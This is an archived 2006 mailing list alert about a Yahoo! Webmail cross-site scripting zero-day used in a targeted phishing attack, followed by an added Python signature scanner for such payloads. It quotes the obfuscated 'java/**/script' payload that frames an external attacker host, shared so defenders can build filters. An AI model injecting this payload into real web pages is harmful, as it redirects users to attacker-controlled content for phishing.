Dailydave mailing list archives
[Argeniss] Alert - Yahoo! Webmail XSS
From: Cesar <sqlsec () yahoo com>
Date: Mon, 17 Apr 2006 12:15:27 -0700 (PDT)
Hi.

I just got a targeted phishing attack on one of my Yahoo email accounts. What is interesting is that the attack exploits a Yahoo! webmail 0day XSS vulnerability. I'm contacting Yahoo right now, but in the meantime I thought it would be good to provide some bits because of the seriousness of this.

When you browse a message on Yahoo! Webmail, the XSS exploit creates a frameset and redirects to http://w00tynetwork.com/x/. It's interesting that the address bar in IE doesn't refresh to show the actual URL; you can only see the redirection to http://w00tynetwork.com/x/ in the IE status bar if you have it visible.

I don't know if this vulnerability is being exploited in the wild, since it was a targeted attack.

Here is an extract from the exploit so you can start building some signatures, filtering, etc.

-----------------------------------
(java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

I will provide full details later when Yahoo! fixes the issue. If security vendors are interested in full details, please ask for them at info>at<argeniss>.<com

Cesar.
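A signature of the kind the message asks for, as an added example that is not part of the original post or any Argeniss code: it matches the script scheme even when comments or whitespace split the keyword, as in the quoted extract, and lists external frame targets. The function names, result keys and the PLAIN and BENIGN samples are assumptions constructed for illustration.

```python
import re

# Filler that lenient HTML/CSS parsers of that era skipped inside a keyword:
# C-style comments (as in the quoted extract) and whitespace/control bytes.
JUNK = r"(?:/\*.*?\*/|[\x00-\x20])*"


def tolerant(word):
    """Regex source matching `word` with JUNK allowed between its letters."""
    return JUNK.join(re.escape(ch) for ch in word)


SCHEME = re.compile(
    "(?:" + "|".join(tolerant(w) for w in ("javascript", "vbscript")) + ")" + JUNK + ":",
    re.I | re.S,
)
FRAME_SRC = re.compile(
    r"<i?frame\b[^>]*?\bsrc\s*=\s*['\"]?(https?://[^\s'\">]+)", re.I
)


def scan(body):
    """Return the script-scheme hit (if any) and external frame targets in body."""
    hit = SCHEME.search(body)
    raw = hit.group(0) if hit else None
    return {
        "scheme": raw,
        # Obfuscated when the match contains anything besides the bare keyword.
        "obfuscated": bool(raw) and re.fullmatch(r"[a-z]+:", raw, re.I) is None,
        "frame_targets": FRAME_SRC.findall(body),
    }


# The extract quoted in the message above, unchanged.
EXTRACT = (
    "(java/**/script:document.write('<frameset cols=100% rows=100% border=0 "
    "frameboarder=0framespacing=0><frame frameborder=0 "
    "src=http://w00tynetwork.com/x/></frameset>'))"
)
# Constructed samples: an unobfuscated link and a harmless message.
PLAIN = '<a href="javascript:void(0)">x</a>'
BENIGN = "<p>The JavaScript meetup is on Tuesday, see http://example.org/</p>"

if __name__ == "__main__":
    for name, text in (("extract", EXTRACT), ("plain", PLAIN), ("benign", BENIGN)):
        print(name, scan(text))
```

Ordinary prose such as "java script: ..." also matches, so in a mail filter the hit is best treated as a score input and combined with the frame-target check.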